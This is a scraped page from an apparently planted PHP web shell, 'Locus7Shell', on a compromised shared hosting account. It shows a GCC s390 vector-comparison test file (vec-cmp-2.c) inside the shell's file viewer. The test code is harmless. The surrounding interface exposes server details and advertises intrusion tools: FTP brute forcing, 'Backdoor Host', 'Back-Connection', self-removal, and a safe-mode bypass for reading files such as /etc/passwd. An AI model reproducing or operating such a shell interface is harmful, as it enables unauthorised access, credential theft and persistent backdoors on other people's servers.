Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/s390/zvector/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vec-cmp-2.c (6.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Similiar to vec-cmp-1.c but requires that
   s390_canonicalize_comparison is able to merge the the two nested
   compares.  */

/* { dg-do compile { target { s390*-*-* } } } */
/* { dg-options "-O3 -mzarch -march=z13 -mzvector -fno-asynchronous-unwind-tables" } */

#include <vecintrin.h>

int g = 1;

void __attribute__((noinline,noclone))
all_eq_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_eq (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_eq_double:\n\tvfcedbs\t%v\[0-9\]*,%v24,%v26\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_ne_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_ne (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_ne_double:\n\tvfcedbs\t%v\[0-9\]*,%v24,%v26\n\tbler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_gt_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_gt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_gt_double:\n\tvfchdbs\t%v\[0-9\]*,%v24,%v26\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_lt_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_lt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_lt_double:\n\tvfchdbs\t%v\[0-9\]*,%v26,%v24\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_ge_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_ge (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_ge_double:\n\tvfchedbs\t%v\[0-9\]*,%v24,%v26\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_le_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_all_le (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_le_double:\n\tvfchedbs\t%v\[0-9\]*,%v26,%v24\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_eq_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_eq (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_eq_double:\n\tvfcedbs\t%v\[0-9\]*,%v24,%v26\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_ne_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_ne (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_ne_double:\n\tvfcedbs\t%v\[0-9\]*,%v24,%v26\n\tber\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_gt_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_gt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_gt_double:\n\tvfchdbs\t%v\[0-9\]*,%v24,%v26\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_lt_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_lt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_lt_double:\n\tvfchdbs\t%v\[0-9\]*,%v26,%v24\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_ge_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_ge (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_ge_double:\n\tvfchedbs\t%v\[0-9\]*,%v24,%v26\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_le_double (vector double a, vector double b)
{
  if (__builtin_expect (vec_any_le (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_le_double:\n\tvfchedbs\t%v\[0-9\]*,%v26,%v24\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_eq_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_eq (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_eq_int:\n\tvceqfs\t%v\[0-9\]*,%v24,%v26\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_ne_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_ne (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_ne_int:\n\tvceqfs\t%v\[0-9\]*,%v24,%v26\n\tbler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_gt_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_gt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_gt_int:\n\tvchfs\t%v\[0-9\]*,%v24,%v26\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_lt_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_lt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_lt_int:\n\tvchfs\t%v\[0-9\]*,%v26,%v24\n\tbner\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_ge_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_ge (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_ge_int:\n\tvchfs\t%v\[0-9\]*,%v26,%v24\n\tbler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
all_le_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_all_le (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times all_le_int:\n\tvchfs\t%v\[0-9\]*,%v24,%v26\n\tbler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_eq_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_eq (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_eq_int:\n\tvceqfs\t%v\[0-9\]*,%v24,%v26\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_ne_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_ne (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_ne_int:\n\tvceqfs\t%v\[0-9\]*,%v24,%v26\n\tber\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_gt_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_gt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_gt_int:\n\tvchfs\t%v\[0-9\]*,%v24,%v26\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_lt_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_lt (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_lt_int:\n\tvchfs\t%v\[0-9\]*,%v26,%v24\n\tbnler\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_ge_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_ge (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_ge_int:\n\tvchfs\t%v\[0-9\]*,%v26,%v24\n\tber\t%r14\n 1 } } */

void __attribute__((noinline,noclone))
any_le_int (vector int a, vector int b)
{
  if (__builtin_expect (vec_any_le (a, b), 1))
    g = 2;
}
/* { dg-final { scan-assembler-times any_le_int:\n\tvchfs\t%v\[0-9\]*,%v24,%v26\n\tber\t%r14\n 1 } } */


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0053 ]--